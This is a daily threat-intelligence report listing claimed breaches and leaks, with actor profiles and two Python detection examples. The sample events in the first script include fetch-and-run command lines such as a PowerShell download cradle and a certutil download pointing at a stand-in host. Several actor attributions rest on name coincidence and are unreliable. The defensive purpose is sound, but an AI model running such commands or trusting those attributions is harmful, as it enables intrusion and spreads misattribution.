[June-24-2025] Daily Cybersecurity Threat Report

I. Executive Summary

The past 24 hours have seen a dynamic array of cybersecurity incidents, underscoring the persistent and evolving nature of global cyber threats. Analysis of recent breaches reveals a landscape where financially motivated cybercriminals are increasingly adopting sophisticated methods, while ideologically driven hacktivist groups are expanding their operations, often with geopolitical undertones. Key incidents observed include data exfiltration campaigns targeting critical sectors, ransomware operations shifting towards pure extortion, and large-scale botnet activities enabling widespread fraud.

A significant trend emerging from these incidents is the blurring of traditional distinctions between threat actor motivations. Groups historically driven by political or social agendas are now actively engaging in financially driven activities, such as offering “DDoS-for-hire” services or launching their own cryptocurrencies [1]. This convergence suggests that ideological objectives are increasingly intertwined with the need for operational funding or personal enrichment, creating a hybrid threat model that demands a multi-faceted defense strategy.

Furthermore, some financially motivated actors are demonstrating capabilities traditionally associated with advanced persistent threat (APT) groups. These actors are moving beyond opportunistic “low-hanging fruit” attacks, employing sophisticated techniques like identity system abuse, cloud exploitation, and complex social engineering tactics [3]. This elevation in capability means that organizations must prepare for financially driven attacks that are as intricate and resource-intensive as those from nation-state adversaries.

II. Daily Incident Overview

The following table summarizes the significant cybersecurity incidents reported in the last 24 hours, providing a high-level overview of the affected entities, attack types, and identified threat actors.

Incident ID | Victim Organization | Attack Type | Data Compromised | Threat Actor(s) | Date/Time of Discovery
INC20250624-001 | Dr. Ambedkar Institute of Management Studies & Research (DAIMSR) | Data Breach | Database | Cyber Regulation Organization | 2025-06-24T12:53:45Z
INC20250624-002 | Unidentified WordPress WooCommerce-based Diet Coaching website | Initial Access | Unauthorized access | SammyWalt | 2025-06-24T12:41:07Z
INC20250624-003 | Early cryptocurrency whales | Data Breach | Contact details, account credentials, wallet-related metadata | Asipati | 2025-06-24T12:35:53Z
INC20250624-004 | Unidentified WordPress WooCommerce-based pet food shop | Initial Access | Unauthorized access | SammyWalt | 2025-06-24T12:06:19Z
INC20250624-005 | JobInfo | Data Breach | 50,000 classified job records, sensitive files tied to drone warfare programs | Handala Hack | 2025-06-24T12:02:27Z
INC20250624-006 | Unspecified Mexican entities | Data Leak | Over 200,000 driving licenses, KYC details, photo/video selfies, user locations | x0day | 2025-06-24T11:55:38Z
INC20250624-007 | Debowae Village Government | Defacement | Website defacement | BABAYO EROR SYSTEM | 2025-06-24T11:51:46Z
INC20250624-008 | Taiwan’s Ministry of National Defense | Data Breach | Sensitive military personnel information (names, ranks, unit assignments, contact details) | Jetimbek | 2025-06-24T11:48:43Z
INC20250624-009 | SSI Securities Corporation | Data Breach | Full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, securities account number | giorggios | 2025-06-24T11:18:49Z
INC20250624-010 | Chinese users | Alert (Data Leak) | Over 4 billion records (social media, financial, employment, government-related information) | WangLiJun2000 | 2025-06-24T11:15:43Z
INC20250624-011 | Defense Visual Information Distribution Service (DVIDS) | Data Breach | Full name, Social Security number, grade/rank, last known duty station, member/serial number, date of birth | DigitalGhost | 2025-06-24T10:54:28Z
INC20250624-012 | Australian client database | Data Leak | Over 24,000 records including Medicare details, passports, driving licenses | Hackermanzorro | 2025-06-24T10:43:24Z
INC20250624-013 | Myrtue Medical Center | Data Breach | 1.2 TB of data, including 806,625 files | Worldleaks | 2025-06-24T09:27:59Z
INC20250624-014 | Pengadilan Agama Krui | Defacement | Website defacement | WOLF CYBER ARMY | 2025-06-24T08:08:43Z
INC20250624-015 | Medpocket (Prosoft Creative Software Solutions) | Data Breach | Complete database | Cyber Fattah Team | 2025-06-24T07:38:40Z
INC20250624-016 | Health products for the elderly in Malaysia | Data Leak | 190,000 records including ID card information | Market Exchange | 2025-06-24T05:34:39Z
INC20250624-017 | LeakNation VPS | Initial Access | Access to offshore VPS infrastructure (no KYC, full root access, allows hacking/scanning) | 303security | 2025-06-24T05:19:31Z
INC20250624-018 | UAE’s vital infrastructure | Alert (DDoS Attack) | Service disruption | TEAM FEARLESS | 2025-06-24T04:51:48Z
INC20250624-019 | UAE’s vital infrastructure | Alert | Unspecified | Dark Storm Team | 2025-06-24T04:44:25Z
INC20250624-020 | 160 Turkish Online Casino Platforms | Data Breach | Member information | markosic | 2025-06-24T04:14:11Z
INC20250624-021 | Malaysian senior citizen database | Data Leak | 180,000 Malaysian senior members aged over 50 | Market Exchange | 2025-06-24T04:11:53Z
INC20250624-022 | Malaysian investors | Data Leak | 130,000 wealthy Malaysian investors | Market Exchange | 2025-06-24T03:55:27Z
INC20250624-023 | Malaysian individuals associated with health products | Data Leak | 200,000 records including ID card information | Market Exchange | 2025-06-24T03:48:53Z
INC20250624-024 | CETDIGIT | Data Breach | 19.2 million B2B records (full names, business emails, job titles, company names, addresses, phone numbers) | morse | 2025-06-24T02:52:19Z
INC20250624-025 | X (formerly Twitter) | Data Breach | Over 200 million email and password combinations | bx1 | 2025-06-24T02:44:56Z
INC20250624-026 | Hospital Civil de Guadalajara | Data Breach | 33,358 files (7.6 GB) of sensitive hospital-related records | kazu | 2025-06-24T02:31:02Z
INC20250624-027 | Ministry of Agriculture of the Republic of Indonesia | Data Breach | 8,438 millennial and “andalan” farmers (personal and business information, NIK, addresses, birth details, phone numbers, emails, ID/passport photos, agricultural subsectors, income, loan involvement) | KEDIRISECTEAM | 2025-06-24T02:20:37Z
INC20250624-028 | Direktorat Jenderal Kependudukan dan Pencatatan Sipil (Dukcapil Indonesia) | Data Breach | Name, address, age, date of birth | HIME666 | 2025-06-24T02:13:05Z
INC20250624-029 | Malaysia visa data | Data Leak | Malaysia visa data | HIME666 | 2025-06-24T01:35:00Z
INC20250624-030 | Malaysia Airlines | Data Breach | 210,000 First Class customers, including passport details | Market Exchange | 2025-06-24T01:15:43Z
INC20250624-031 | Individuals in UK and USA | Data Leak | 1,500 credit card and bank records | Octo Dark Cyber Squad (Official) | 2025-06-24T00:56:47Z
INC20250624-032 | CGI India | Data Breach | Name, email, city, phone | HIME666 | 2025-06-24T00:49:54Z
INC20250624-033 | Federal Bureau of Investigation (FBI) | Data Breach | Personal information of FBI leadership (addresses, sensitive details) | uralxploitvhem | 2025-06-24T00:48:57Z
INC20250624-034 | LuxService | Data Breach | Personal information of users (full names, email addresses, phone numbers, home addresses) | RXY | 2025-06-24T00:19:31Z
INC20250624-035 | Al Moasher Business (ERP & CRM) | Data Breach | Complete 46 GB dataset (33,358 files) | HIME666 | 2025-06-24T00:10:13Z

III. In-Depth Incident Analysis & Threat Actor Profiles

This section provides a detailed analysis of each reported incident, including comprehensive profiles of the associated threat actors, their methodologies, and the broader implications of their activities.

Incident INC20250624-001: Alleged data breach of Dr. Ambedkar Institute of Management Studies & Research

Incident Details:

The Cyber Regulation Organization claims to have obtained the database of Dr. Ambedkar Institute of Management Studies & Research (DAIMSR) in India. This incident highlights the vulnerability of educational institutions to data breaches, which can expose sensitive personal and academic information.

Threat Actor Profile: Cyber Regulation Organization

The term “Cyber Regulation Organization” in the context of a threat actor claiming a breach is unusual, as it typically refers to legitimate entities involved in cybersecurity investigations and regulation, such as the U.S. Secret Service’s Cyber Investigative Section or the Cybersecurity and Infrastructure Security Agency (CISA) [4]. These organizations are dedicated to combating cybercrime, disrupting transnational cybercrime networks, and safeguarding critical infrastructure and financial systems [5]. They work to prevent, detect, mitigate, and investigate cyberattacks through partnerships with law enforcement, private industry, and academia [5]. Given this, it is highly probable that “Cyber Regulation Organization” is a self-proclaimed, misleading, or ironic moniker used by a malicious actor, rather than a genuine regulatory body engaging in illicit activities. Specific threat intelligence on a malicious group operating under this exact name is not available in the provided research.

Associated Resources:

Incident INC20250624-002: Alleged sale of unauthorized access to an online Diet Coaching site in Netherlands

Incident Details:

A threat actor named SammyWalt claims to be selling unauthorized access to an unidentified WordPress WooCommerce-based Diet Coaching website operating in the Netherlands. This type of incident, involving the sale of initial access, is a common precursor to more significant attacks, such as data exfiltration or ransomware deployment.

Threat Actor Profile: SammyWalt

Specific threat intelligence on a malicious actor or group named “SammyWalt” is not available in the provided research [9]. This name may represent an individual actor, a temporary alias, or a less prominent entity within the cybercrime ecosystem.

Associated Resources:

Incident INC20250624-003: Alleged data sale of UHQ Early crypto whales

Incident Details:

The threat actor Asipati claims to be selling a database allegedly containing the data of early cryptocurrency whales. The compromised information reportedly includes contact details, account credentials, and wallet-related metadata linked to high-value early investors. This type of data is highly valuable for financial fraud and targeted attacks.

Threat Actor Profile: Asipati

Specific threat intelligence on a malicious actor or group named “Asipati” is not available in the provided research [10]. The name appears in contexts related to general cybercrime discussions or law enforcement efforts against cybercrime, such as INTERPOL’s Asia and South Pacific Joint Operations on Cybercrime (ASPJOC) [11]. This suggests “Asipati” might be an individual or an ephemeral alias rather than a well-documented threat group.

Associated Resources:

Incident INC20250624-004: Alleged sale of unauthorized access to a Pet food shop in Malta

Incident Details:

A threat actor named SammyWalt claims to be selling access to a WordPress WooCommerce-based pet food shop operating in Malta (EU). The store reportedly runs on WordPress and handles online sales of pet supplies. Similar to the previous incident, this is an initial access sale, indicating potential for further malicious activity.

Threat Actor Profile: SammyWalt

As noted previously, specific threat intelligence on a malicious actor or group named “SammyWalt” is not available in the provided research [9]. This name may represent an individual actor, a temporary alias, or a less prominent entity within the cybercrime ecosystem.

Associated Resources:

Incident INC20250624-005: Alleged Leak of JobInfo Data

Incident Details:

The Handala Hack group claims to have breached JobInfo, gaining access to sensitive files tied to personnel involved in drone warfare programs such as Project Hermes. The compromised data reportedly includes 50,000 classified job records of individuals the group describes as linked to “Zionist” military-security operations. This incident highlights the targeting of human resources and defense-related entities for politically motivated data exfiltration.

Threat Actor Profile: Handala Hack

Handala Hack, also known as Handala Hacking Team, is a pro-Palestinian hacktivist group that has been active since at least December 2023 [10]. The group heavily targets Israeli organizations and those supporting them, using the character “Handala” as a symbol of Palestinian identity and defiance across their social media accounts [10]. Their motivations are deeply rooted in the Israel-Iran cyber conflict, aiming to disrupt “systems of occupation and disinformation” and spread anti-Israel narratives [14].

Handala Hack employs a wide range of sophisticated tactics, including data theft, phishing (including SMS), extortion, website defacement, and destructive attacks leveraging custom wiper malware that targets both Windows and Linux environments [10]. They opportunistically create phishing campaigns using advanced social engineering techniques, often masquerading as legitimate organizations [10]. The group has claimed responsibility for leaking hundreds of thousands of documents from Israeli firms, including alleged military fuel supply ties and internal databases, and a major breach of the Weizmann Institute, claiming to have stolen terabytes of classified research [14]. They also allegedly compromised TBN Israel and Mor Logistics Ltd, leaking significant volumes of data [14]. Handala Hack’s activities tend to escalate during periods of high geopolitical tension, and they have issued warnings signaling future targets in the finance sector [14].

Associated Resources:

Incident INC20250624-006: Alleged sale of driving license and KYC data from Mexico

Incident Details:

The threat actor x0day is offering to sell over 200,000 records sourced from Mexico, containing driving licenses, KYC (Know Your Customer) details, high-quality photo/video selfies, user locations, and other sensitive personal information. This type of data is highly valuable for identity theft and various forms of fraud.

Threat Actor Profile: x0day (XE Group)

The threat actor “x0day” is likely an alias for XE Group, a Vietnam-based cybercriminal organization that has been active for over a decade [15]. The name “x0day” itself references their capability to exploit zero-day vulnerabilities [16]. XE Group has significantly evolved its capabilities from initial credit-card skimming operations to exploiting zero-day vulnerabilities and maintaining long-term persistence within compromised networks [15]. Their primary motivation is financial gain, achieved through sophisticated data theft and maintaining covert access [15].

Initially, XE Group exploited known vulnerabilities to deploy webshells for payment data theft [15]. By 2024, they shifted to targeted information theft, exploiting zero-day vulnerabilities in supply chain management software [15]. Their ability to reactivate webshells planted years prior and maintain access for over four years demonstrates a remarkable level of patience and operational discipline, indicating a strategic goal beyond immediate monetization, possibly for intelligence gathering or future large-scale operations [15]. This blurs the lines between advanced cybercrime and nation-state APTs, as such capabilities are typically associated with highly resourced state-sponsored actors [15]. XE Group utilizes native Microsoft Windows utilities and PowerShell scripts to load Meterpreter malware, demonstrating a “living off the land” approach to evade detection [15].
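Because the tradecraft described above relies on built-in Windows binaries and PowerShell rather than dropped malware, detection has to look at process lineage and command-line shape instead of file hashes. The following Python triage function is an added example written for this report; it is not code from the original page or from any source cited here. It runs a few such heuristics (a web worker spawning a shell, encoded or hidden PowerShell, download cradles, a LOLBin reaching out to a URL) over constructed Sysmon-style process-creation events. The field names, hostnames, paths and command lines are assumptions for illustration, not observed XE Group telemetry.

```python
"""Heuristic triage of process-creation events for 'living off the land' loader
patterns. Sample events are constructed; field names follow Sysmon Event ID 1
(an assumed schema, adjust to your telemetry)."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Parent/child pairs and binaries of interest (assumed; extend per environment).
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line shapes that are rare in admin scripting but common in loaders.
ENCODED = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
CRADLE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|invoke-expression)")
HIDDEN = re.compile(r"(?i)-w(indowstyle)?\s+hidden")
REMOTE_URL = re.compile(r"(?i)https?://")


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def reasons_for(ev: ProcEvent) -> List[str]:
    """Return the heuristic hits for one event; an empty list means no finding."""
    img, parent, cl = base(ev.image), base(ev.parent_image), ev.command_line
    hits: List[str] = []
    if parent in WEB_WORKERS and img in SHELLS:
        hits.append("web worker spawned a shell (webshell indicator)")
    if img in POWERSHELL:
        if ENCODED.search(cl):
            hits.append("encoded PowerShell command")
        if CRADLE.search(cl):
            hits.append("download/execute cradle")
        if HIDDEN.search(cl):
            hits.append("hidden window")
    if img in LOLBINS and REMOTE_URL.search(cl):
        hits.append(f"{img} fetching remote content")
    return hits


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, List[str]]]:
    """Keep only events with at least one hit, as (host, image, reasons)."""
    out = []
    for ev in events:
        hits = reasons_for(ev)
        if hits:
            out.append((ev.host, base(ev.image), hits))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent("ws01", r"C:\Windows\explorer.exe", PS,
              "powershell.exe -NoProfile Get-ChildItem C:\\Users"),
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe", PS,
              "powershell.exe -nop -w hidden -e QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
    ProcEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
              "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ProcEvent("ws03", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent("ws04", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -f http://example.invalid/p.bin p.bin"),
]

if __name__ == "__main__":
    for host, image, reasons in triage(SAMPLE_EVENTS):
        print(f"{host:6} {image:16} {'; '.join(reasons)}")
```

Of the six constructed events only the explorer-launched directory listing and the service host are clean; the two children of w3wp.exe are the webshell signal the paragraph describes, and the Office-spawned cradle and certutil download show why parent process and command line carry more signal than the binary itself, which is legitimate in every case. Tune the sets and patterns to your own baseline before treating any single hit as an incident.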

Associated Resources:

Incident INC20250624-007: BABAYO EROR SYSTEM targets the website of Debowae Village Government

Incident Details:

The group BABAYO EROR SYSTEM claims to have defaced the website of Debowae Village Government in Indonesia. Website defacement is a common tactic used by hacktivist groups to spread messages, demonstrate capabilities, or simply cause disruption.

Threat Actor Profile: BABAYO EROR SYSTEM

Specific threat intelligence on a malicious actor or group named “BABAYO EROR SYSTEM” is not extensively detailed in the provided research [18]. However, the act of website defacement aligns with common hacktivist activities, which often involve using computer code to expose information, destroy data, or disrupt operations [21]. Hacktivists may operate anonymously, sometimes in groups, and use various tools to carry out their operations [22]. While the specific motivations for this group are not provided, hacktivism is often driven by political, social, or religious ideals [21].

Associated Resources:

Incident INC20250624-008: Alleged database sale of Taiwan’s Ministry of National Defense

Incident Details:

The threat actor Jetimbek claims to be selling a database allegedly belonging to Taiwan’s Ministry of National Defense. The compromised data reportedly includes sensitive military personnel information, such as names, ranks, unit assignments, and contact details. This is a significant national security incident, potentially involving state-sponsored espionage or intelligence gathering.

Threat Actor Profile: Jetimbek

Specific threat intelligence on a malicious actor or group named “Jetimbek” is not available in the provided research [25]. However, the name “Jetimbek” appears in the context of a Department of Justice press release about charging members of the “FIN9” cybercrime group [25]. FIN9 is described as a sophisticated international cybercrime group that has caused tens of millions in losses by using phishing campaigns and supply chain attacks to steal non-public information, employee benefits, and funds [25]. While “Jetimbek” is not explicitly identified as a member of FIN9, the association in the provided data suggests a connection to financially motivated cybercrime, potentially involving data theft for resale.

Associated Resources:

Incident INC20250624-009: Alleged data leak of SSI Securities Corporation

Incident Details:

The threat actor giorggios claims to have leaked the data of SSI Securities Corporation in Vietnam. The compromised data includes full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, and securities account number. This is a significant breach impacting the financial services sector.

Threat Actor Profile: giorggios

Specific threat intelligence on a malicious actor or group named “giorggios” is not available in the provided research [27]. The name is mentioned in a daily cybersecurity threat report in the context of an “alleged breach of Indonesian delivery records,” suggesting an individual or group involved in data theft, likely for financial gain [28]. However, no detailed profile or specific attack methods are attributed to “giorggios” beyond general data theft activities.

Associated Resources:

Incident INC20250624-010: Alleged leak of 4 Billion Chinese Personal Records

Incident Details:

A threat actor on a hacking forum, WangLiJun2000, is discussing a recent data breach reportedly involving over 4 billion records of Chinese users. Researchers describe this as “the largest single-source leak of Chinese personal data ever identified,” allegedly including social media, financial, employment, and government-related information. The user is seeking access to the data from others in the forum.

Threat Actor Profile: WangLiJun2000 (Yunhe Wang)

“WangLiJun2000” is associated with Yunhe Wang, a 35-year-old Chinese national arrested for allegedly running the “911 S5” botnet, described as one of the world’s largest cybercrime botnets [29]. Active since at least 2014, Wang amassed approximately $99 million in profits by reselling access to this vast network of compromised Windows computers to other criminals [29]. This operation highlights the immense scale of cybercrime infrastructure and how large-scale compromised networks are rented out to facilitate a wide range of illicit activities, underpinning a vast criminal ecosystem [29].

The botnet’s reach enabled criminals to steal billions of dollars from financial institutions and federal lending programs, with over half a million fraudulent unemployment insurance claims originating from compromised IP addresses [29]. Wang managed this extensive infrastructure through 150 dedicated servers and used his illicit gains to purchase 21 properties across multiple countries, demonstrating the significant financial returns associated with providing such illicit services [29]. This case underscores the interconnectedness of various cybercriminal activities and the crucial role of specialized service providers within this ecosystem.

Associated Resources:

Incident INC20250624-011: Alleged data breach of Defense Visual Information Distribution Service (DVIDS)

Incident Details:

The threat actor DigitalGhost claims to have breached the data of the Defense Visual Information Distribution Service (DVIDS) in the USA. The compromised data includes full name, Social Security number, grade or rank, last known duty station, member or serial number (for Air Force), and date of birth (for Air Force). This is a significant breach of military-related personal information.

Threat Actor Profile: DigitalGhost (GhostSec)

“DigitalGhost” is an alias for GhostSec, an organized hacktivist group with ties to the Anonymous collective [30]. GhostSec gained prominence for operations against ISIS in 2015 and has participated in numerous campaigns targeting enterprises, banks, and governments under the pretense of defending human rights [30]. Their activities, often broadcast on Twitter and Telegram, include DDoS attacks, system intrusion, webpage defacement, and data leaks [30].

Notably, in late July 2022, GhostSec announced a shift from an ideological hacktivist group to a financially motivated cyber mafia, launching a subscription-based Telegram channel with the statement “Hacktivism does not pay the bills!” [30]. This explicit shift highlights a profound trend where even ideologically driven groups seek monetization to sustain operations or enrich members. The group’s internal split, with some members forming “Ghost Security Group” to collaborate with government agencies, illustrates the fluid and often fractured nature of hacktivist groups [30].

Associated Resources:

Incident INC20250624-012: Alleged sale of Australian client database

Incident Details:

The threat actor Hackermanzorro is offering to sell a database containing over 24,000 records from an Australian client database. The exposed data includes Medicare details, passports, and driving licenses. This is a significant data leak, highly valuable for identity theft and fraud.

Threat Actor Profile: Hackermanzorro

Specific threat intelligence on a malicious actor or group named “Hackermanzorro” is not available in the provided research [32]. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-013: Alleged data breach of Myrtue Medical Center

Incident Details:

The group Worldleaks claims to have breached 1.2 TB of data, including 806,625 files, from Myrtue Medical Center in the USA. This incident highlights the vulnerability of the healthcare sector to large-scale data breaches, which can have severe consequences for patient privacy and operational integrity.

Threat Actor Profile: Worldleaks

World Leaks emerged in early 2025 as a new extortion platform, launched by the operators previously associated with the Hunters International ransomware group [33]. This strategic pivot from traditional double extortion (encryption plus data theft) to an “extortion-only” model was driven by increased risks and reduced profitability in the conventional ransomware landscape [33]. The group’s primary motivation is financial gain through data exfiltration and the subsequent threat of public disclosure [33].

World Leaks operates as an “Extortion-as-a-Service” (EaaS) platform, providing affiliates with tools, including a self-developed exfiltration utility, to automate data theft [33]. While the group claims to be extortion-only, investigations have revealed instances where victims still experienced ransomware deployment, indicating collaborations with other ransomware groups like Secp0 [33]. This suggests that the EaaS model may attract a wider range of threat actors, potentially leading to varied attack outcomes for victims. The group employs a highly professionalized and structured business model, utilizing four distinct platforms to conduct its operations, including a main data leak site (DLS), a negotiation site (victim panel), an “Insider” platform for journalists, and an affiliate panel [33]. This operational sophistication, complete with elements like a support chat and psychological tactics to create urgency and fear, mirrors legitimate Software-as-a-Service (SaaS) operations, demonstrating a calculated approach to maximizing illicit profits [33].
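In an extortion-only model the decisive step of the intrusion is bulk egress rather than encryption, so baseline-relative egress monitoring is the control aimed most directly at it. The following Python example is added here and is not code from the page, from World Leaks, or from any vendor tooling. It compares each host’s daily outbound volume against that host’s own prior-day median, applies an absolute floor so small hosts do not alert on noise, and lists the destinations the host had never contacted before on the flagged day. The flow records, hostnames, IP addresses (taken from documentation ranges) and thresholds are constructed assumptions.

```python
"""Baseline-relative egress monitoring for bulk exfiltration.
Flow records are constructed; the schema (day, host, dst_ip, bytes_out) and the
ratio/floor thresholds are assumptions to be tuned per environment."""
from collections import defaultdict
from statistics import median
from typing import Dict, List, Set, Tuple

Flow = Tuple[int, str, str, int]  # (day, host, dst_ip, bytes_out)
MB = 1_000_000
GB = 1_000 * MB


def build_sample_flows() -> List[Flow]:
    """Seven quiet days for two hosts, then a day where fs01 pushes ~35 GB to a new address."""
    flows: List[Flow] = []
    for day in range(1, 8):
        flows.append((day, "fs01", "203.0.113.10", 40 * MB))  # routine sync to a known service
        flows.append((day, "fs01", "203.0.113.11", 12 * MB))
        flows.append((day, "ws05", "203.0.113.10", 5 * MB))
    flows.append((8, "fs01", "203.0.113.10", 38 * MB))
    flows.append((8, "fs01", "198.51.100.77", 35 * GB))  # never-seen destination, bulk transfer
    flows.append((8, "ws05", "203.0.113.10", 6 * MB))
    return flows


def daily_egress(flows: List[Flow]) -> Dict[str, Dict[int, int]]:
    """Sum bytes_out per host per day."""
    totals: Dict[str, Dict[int, int]] = defaultdict(lambda: defaultdict(int))
    for day, host, _dst, nbytes in flows:
        totals[host][day] += nbytes
    return totals


def destinations_before(flows: List[Flow], day: int) -> Dict[str, Set[str]]:
    """Destinations each host contacted on any day strictly before `day`."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for d, host, dst, _ in flows:
        if d < day:
            seen[host].add(dst)
    return seen


def flag_exfil(flows: List[Flow], day: int, ratio: float = 10.0,
               floor_bytes: int = 1 * GB) -> List[dict]:
    """Alert when a host's egress on `day` is at least `ratio` times its prior-day
    median and at least `floor_bytes`; the floor stops 1 MB -> 20 MB from alerting."""
    totals = daily_egress(flows)
    known = destinations_before(flows, day)
    alerts = []
    for host, per_day in totals.items():
        history = [b for d, b in per_day.items() if d < day]
        today = per_day.get(day, 0)
        if not history or today == 0:
            continue  # no baseline yet, or nothing sent today
        baseline = median(history)
        if today >= floor_bytes and today >= ratio * baseline:
            new_dsts = sorted({dst for d, h, dst, _ in flows
                               if d == day and h == host and dst not in known[host]})
            alerts.append({"host": host, "day": day, "bytes_out": today,
                           "baseline": baseline, "new_destinations": new_dsts})
    return alerts


if __name__ == "__main__":
    for a in flag_exfil(build_sample_flows(), day=8):
        print(f"{a['host']}: {a['bytes_out'] / GB:.1f} GB on day {a['day']} "
              f"(baseline {a['baseline'] / MB:.0f} MB/day); new destinations: {a['new_destinations']}")
```

On the constructed data only fs01 on day 8 alerts, and the never-seen destination is what an analyst pivots on first. A single-day ratio is deliberately simple: an exfiltration utility that throttles a transfer over a week stays under it, so production use pairs this with a rolling multi-day sum and with per-destination volumes rather than per-host totals alone.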

Associated Resources:

Incident INC20250624-014: WOLF CYBER ARMY targets the website of Pengadilan Agama Krui

Incident Details:

The threat actor WOLF CYBER ARMY claims to have defaced the website of Pengadilan Agama Krui, a legal services entity in Indonesia. This is another instance of website defacement, often used by hacktivist groups to make a statement or demonstrate their capabilities.

Threat Actor Profile: WOLF CYBER ARMY

Specific threat intelligence on a malicious actor or group named “WOLF CYBER ARMY” is not extensively detailed in the provided research [35]. However, the name suggests a hacktivist group, and their activity aligns with common hacktivist tactics such as website defacement [36]. Hacktivist groups are often politically, socially, or religiously motivated and may coordinate efforts to amplify attacks against shared adversaries [36]. They can employ various methods, including DDoS attacks, data leaks, and defacements, to disrupt services and erode public trust [36]. While some hacktivists operate as “lone wolves,” others are part of organized groups [22].

Associated Resources:

Incident INC20250624-015: Alleged database sale of Medpocket

Incident Details:

The threat actor Cyber Fattah Team claims to be selling a complete database of Medpocket, a healthcare and pharmaceuticals entity in Syria. This incident involves the sale of sensitive healthcare data, which can be used for various malicious purposes, including fraud or targeted attacks.

Threat Actor Profile: Cyber Fattah Team

The Cyber Fattah Team is a pro-Iranian hacktivist group deeply involved in geopolitical cyber conflicts, primarily targeting entities perceived as adversaries of Iran, including the United States, Israel, and Saudi Arabia [40]. The group’s actions are explicitly linked to broader information operations designed to spread anti-US, anti-Israel, and anti-Saudi narratives and sow insecurity across the region [40]. This highlights how nation-states leverage hacktivist groups as proxies to conduct cyber warfare and influence operations, blurring the lines between traditional state-sponsored espionage and public-facing hacktivism [40].

Cyber Fattah operates under the alias “Iranian Cyber Team” and maintains close collaborations with other groups such as 313 Team, LulzSec Black, and Cyber Islamic Resistance [40]. They are also a member of the “Holy League,” a conglomerate of hacktivists targeting Israel, and have cooperated with groups like CyberVolk, which targets NATO countries [40]. Their history includes attacks on Israeli solar energy companies and defacements referencing figures like Hassan Nasrallah of Hezbollah [40]. The group’s attack methods primarily involve data exfiltration, often through vulnerabilities like unauthorized phpMyAdmin access, followed by public data leaks [40]. They frequently announce their breaches on their official Telegram channel, strategically timing these disclosures to amplify geopolitical events [40]. The use of “burner profiles” like ‘ZeroDayX’ on dark web forums to release stolen data is a common tactic to obscure direct attribution and maintain plausible deniability [40].

Associated Resources:

Incident INC20250624-016: Alleged database leak of Health products for the elderly in Malaysia

Incident Details:

The threat actor Market Exchange is offering to sell a database containing over 190,000 records from Malaysia, related to health products for the elderly, including ID card information. This is a significant data leak, potentially impacting a vulnerable demographic.

Threat Actor Profile: Market Exchange

The term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold [42]. It is not generally identified as a specific threat actor group [44]. These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud [45]. The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.

Associated Resources:

Incident INC20250624-017: Alleged Sale of Access to LeakNation VPS

Incident Details:

The threat actor 303security claims to be selling initial access to offshore VPS infrastructure via the LeakNation forum. The servers reportedly come with no KYC (Know Your Customer), full root access, and explicitly allow hacking and scanning. This type of offering facilitates further cybercriminal activities by providing anonymous infrastructure.

Threat Actor Profile: 303security

The threat actor “303security” is likely an alias for “303,” a name linked to prior breaches, including an alleged infiltration of an Indian software firm in late 2024 that impacted several major insurance providers [46]. This pattern suggests a potential ongoing campaign targeting large corporations and critical infrastructure across various sectors [46]. While specific motivations for their activities are not always explicitly detailed, the nature of their alleged leaks, such as GitHub credentials and proprietary source code from Deloitte, points towards objectives that could include intellectual property theft, enabling further supply chain vulnerabilities, or setting the stage for future ransomware exploitation [46]. It is important to note that “303 Security” also refers to a Linux Professional Institute certification (LPIC-3), which can cause ambiguity in threat intelligence [47].

Associated Resources:

Incident INC20250624-018: TEAM FEARLESS claims to target UAE

Incident Details:

A recent post by the group TEAM FEARLESS indicated that they are targeting UAE’s vital infrastructure using a DDoS attack. This highlights the use of cyberattacks for geopolitical purposes, aiming to disrupt critical services.

Threat Actor Profile: TEAM FEARLESS

Team Fearless is identified as one of 65 pro-Iran hacktivist groups involved in the Israel-Iran cyber conflict [14]. They are part of a visible alliance of pro-Palestinian and anti-Israel hacktivist groups, predominantly from South Asia, whose activity tends to rise during high-tension periods [14]. While specific details on their history or typical attack methods are not extensively provided, they have been mentioned in the context of amplifying warnings about cyberattacks against the U.S. if it joined the war against Iran, suggesting potential coordination and escalation in response to geopolitical developments [48]. Future actions from such groups may include destructive wiper malware, ransomware claims for financial support, disruptive intrusions into operational technology (OT) systems like water, fuel, or power grids, and exploitation of PLCs and SCADA systems [14]. This indicates a dangerous escalation towards critical infrastructure targets, with potentially severe real-world consequences beyond data theft or financial loss [14].

Associated Resources:

Incident INC20250624-019: Dark Storm Team claims to target UAE

Incident Details:

A recent post by the group Dark Storm Team indicated that they are targeting UAE’s vital infrastructure. While the specific type of attack is not detailed in this alert, it aligns with their history of politically motivated cyberattacks.

